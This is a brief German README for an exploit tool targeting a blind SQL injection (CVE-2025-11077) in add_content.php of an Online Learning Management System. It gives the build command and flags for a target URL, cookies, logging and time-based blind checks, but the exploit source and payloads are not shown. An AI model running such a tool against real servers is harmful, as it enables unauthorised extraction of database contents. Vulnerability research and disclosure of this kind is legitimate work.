
Blind SQL Injection in (Online Learning Management System) ausnutzen
Autor: Byte Reaper
Diese Schwachstelle ist eine Blind-SQL-Injection in der Datei add_content.php des Online Learning Management Systems (CVE-2025-11077), die es einem Angreifer ermöglicht, Datenbankinformationen durch das Senden präparierter POST-Anfragen zu extrahieren.
Linux x86_64
GCC
gcc exploit.c argparse.c -o CVE-2025-11077 -lcurl
- HILFE :
./CVE-2025-11077 -h
- Ziel-URL (Basis-URL)
./CVE-2025-11077 -u http://[IP]
- Log-Datei :
./CVE-2025-11077 -f [DATEI]
- Zeitbasierte Blind-Prüfung :
./CVE-2025-11077 -u http://[IP] -b
- Cookies-Datei :
./CVE-2025-11077 -u http://[IP] -c [DATEI]
MIT